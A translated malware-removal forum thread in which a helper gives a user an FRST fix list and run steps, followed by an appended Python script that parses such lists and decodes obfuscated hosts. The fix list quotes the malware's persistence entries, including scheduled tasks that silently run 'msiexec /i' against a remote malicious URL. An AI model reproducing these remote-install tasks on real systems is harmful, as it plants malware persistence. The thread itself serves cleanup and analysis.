system
October 15, 2018, 7:36pm
1
Hello, during normal use of my PC, even when I am not using any browser, a message appears saying:
We safely aborted the connection on reserved-18:09, because it was infected with URL: Mal.
I have already followed the steps given by jefferson sant at: https://forum.avast.com/index.php?topic=222111.0
With that, attached are the logs produced after running the FRST tool.
Thanks in advance!
system
October 15, 2018, 8:13pm
2
Screenshot of what happened attached.
Good evening PauloEduJr.
You will be referred to the malware removal specialist.
Please wait while he checks the logs and prepares the fix your system needs.
Open Notepad (click Start button → type notepad.exe → press Enter)
Copy the text from the code block below and paste it into Notepad
Start
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [OFX2MHJ73DG0V1P] => "C:\Program Files\Z2TPWW63HD\Z2TPWW63H.exe"
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [5NKCD3T568NOTBX] => "C:\Program Files (x86)\avdy4xd255s\IT2WO.exe"
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [TD06HHFP5CTIKRU] => "C:\Program Files\MARAE1CS4W\MARAE1CS4.exe"
AppInit_DLLs: C:\ProgramData\Kolnixo\Latdontex.dll => Nenhum Arquivo
AppInit_DLLs-x32: C:\ProgramData\Kolnixo\Unazoocore.dll => Nenhum Arquivo
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqRiJPeLR9xpZw-YCRDaqHUNFn4VvdPoH3kThd5Pb-DfTeDFWC3jmZ1uTs96rKYaW-FFJwcupTKq-GkE7JtUIUQmlM,
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3827494730-315343196-2291642818-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
FF ProfilePath: C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default [2018-10-08]
FF user.js: detected! => C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default\user.js [2017-06-30]
FF Homepage: Mozilla\Firefox\Profiles\h1uvz66m.default -> file:///C:/ProgramData/Kolnixos/ff.HP
FF NewTab: Mozilla\Firefox\Profiles\h1uvz66m.default -> file:///C:/ProgramData/Kolnixos/ff.NT
FF Extension: (System Table) - C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default\Extensions\383882@modext.tech.xpi [2018-08-22]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-09-17] <==== ATENÇÃO
CHR NewTab: Default -> Not-active:"chrome-extension://pbdpajcdgknpendpmecafmopknefafha/index.html"
Task: {175C0283-03A8-4588-AE0A-D2A13688C342} - System32\Tasks\{D9CB0165-AADE-AFE6-309A-89FFBC6068FA} => C:\Windows\SysWOW64\yEiCoYMHMkAII.exe
Task: {340341A9-02B5-4732-B1BE-E95FA8B555B5} - System32\Tasks\{977FC540-862A-1485-BE8E-EBE713CA2632} => "msiexec.exe" /i hxxp://reserved-1809.info/wqinlpdbtyiae.iim /q
Task: {ABA50C80-93BA-47D7-9B71-E787F5DAE34E} - System32\Tasks\{51429B8F-1957-2A2F-F8F9-19D260D02656} => C:\Program Files (x86)\EdEyamlne.exe <==== ATENÇÃO
Task: {DA8F3809-E003-4362-A9E6-336B51F17E3C} - System32\Tasks\{35F07B8B-E8E3-128A-9CD2-641985BE45E2} => "msiexec.exe" /q /i hxxp://reserved-1809.info/ieokzkigppaxj.avg
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
VirusTotal: C:\Program Files\Z2TPWW63HD\Z2TPWW63H.exe;C:\Program Files (x86)\avdy4xd255s\IT2WO.exe;C:\Program Files\MARAE1CS4W\MARAE1CS4.exe;C:\Windows\SysWOW64\yEiCoYMHMkAII.exe;
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\Users\Todos os Usuários\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
AlternateDataStreams: C:\Users\Todos os Usuários\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
C:\Users\Larissa\AppData\Roaming\if1c3d5ltac
C:\Users\Larissa\AppData\Roaming\3a3uavskp25
C:\Program Files\Z2TPWW63HD
C:\Program Files (x86)\avdy4xd255s
C:\Program Files\MARAE1CS4W
C:\ProgramData\Kolnixo
C:\ProgramData\Kolnixos
C:\Windows\SysWOW64\yEiCoYMHMkAII.exe
C:\Program Files (x86)\EdEyamlne.exe
2018-09-17 14:51 - 2018-09-17 14:51 - 007784960 _____ () C:\Users\Larissa\AppData\Local\agent.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000070896 _____ () C:\Users\Larissa\AppData\Local\Config.xml
2018-09-17 14:51 - 2018-09-17 14:51 - 002020245 _____ () C:\Users\Larissa\AppData\Local\Dentodex.tst
2018-09-17 14:50 - 2018-09-17 14:50 - 000017664 _____ () C:\Users\Larissa\AppData\Local\InstallationConfiguration.xml
2018-09-17 14:50 - 2018-09-17 14:50 - 000140800 _____ () C:\Users\Larissa\AppData\Local\installer.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000018432 _____ () C:\Users\Larissa\AppData\Local\Main.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000005568 _____ () C:\Users\Larissa\AppData\Local\md.xml
2018-09-17 14:51 - 2018-09-17 14:51 - 000126464 _____ () C:\Users\Larissa\AppData\Local\noah.dat
2018-09-17 14:50 - 2018-09-17 14:50 - 001413120 _____ () C:\Users\Larissa\AppData\Local\sham.db
2018-09-17 14:51 - 2018-09-17 14:51 - 000032038 _____ () C:\Users\Larissa\AppData\Local\uninstall_temp.ico
2018-09-17 14:51 - 2018-09-17 14:51 - 000000003 _____ () C:\Users\Larissa\AppData\Local\wbem.ini
EmptyTemp:
End
Go to File → Save As
Make sure that UTF-8 is selected as Encoding (left side of the Save button)
Save it as fixlist.txt on the Desktop
Open FRST again and click on the Fix button
Wait until FRST finishes
fixlog.txt should be generated and opened. Attach it to your post and wait for further instructions.
I forwarded it to Sass Drake. The log will be checked tomorrow.
What is system status now?
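As an added example (not part of this thread and not FRST's own code), a small Python triage helper that reads fix-list entries in the format shown above, pulls out the persistence locations (Run keys, scheduled tasks, AppInit_DLLs) and percent-decodes the obfuscated hosts hidden in the hxxp URLs. The sample lines are copied from the fix list, with the long ?p= token replaced by a placeholder.

```python
import re
from urllib.parse import unquote, urlsplit

# Sample input: four entries copied from the FRST fix list above; the long
# ?p= tracking token is shortened to the placeholder TOKEN.
SAMPLE = r"""
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [OFX2MHJ73DG0V1P] => "C:\Program Files\Z2TPWW63HD\Z2TPWW63H.exe"
AppInit_DLLs: C:\ProgramData\Kolnixo\Latdontex.dll => Nenhum Arquivo
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=TOKEN,&q={searchTerms}
Task: {340341A9-02B5-4732-B1BE-E95FA8B555B5} - System32\Tasks\{977FC540-862A-1485-BE8E-EBE713CA2632} => "msiexec.exe" /i hxxp://reserved-1809.info/wqinlpdbtyiae.iim /q
"""

# Line shapes FRST uses for the three persistence mechanisms in the fix list.
RUN_RE = re.compile(r'\\Run: \[(?P<name>[^\]]+)\] => "?(?P<target>[^"]+?)"?$')
TASK_RE = re.compile(r'^Task: \{[^}]+\} - (?P<task>\S+) => (?P<cmd>.+)$')
APPINIT_RE = re.compile(r'^AppInit_DLLs(?:-x32)?: (?P<dll>.+?) => (?P<status>.+)$')
# FRST defangs URLs as hxxp/hxxps; the host may be percent-encoded.
URL_RE = re.compile(r'hxxps?://\S+')


def decode_host(url: str) -> str:
    """Return the percent-decoded host of a defanged (hxxp) URL."""
    host = urlsplit(url.replace("hxxp", "http", 1)).hostname or ""
    return unquote(host)


def triage(text: str) -> list:
    """Classify fix-list lines into (kind, key, detail) findings."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if (m := RUN_RE.search(line)):
            findings.append(("autorun", m["name"], m["target"]))
        elif (m := TASK_RE.match(line)):
            findings.append(("scheduled_task", m["task"], m["cmd"]))
        elif (m := APPINIT_RE.match(line)):
            findings.append(("appinit_dll", m["dll"], m["status"]))
        # Any line may also reference a remote host (search hijack, msiexec /i URL).
        for url in URL_RE.findall(line):
            findings.append(("remote_host", decode_host(url), url))
    return findings


if __name__ == "__main__":
    for kind, key, detail in triage(SAMPLE):
        print(f"{kind:15} {key}  <-  {detail}")
```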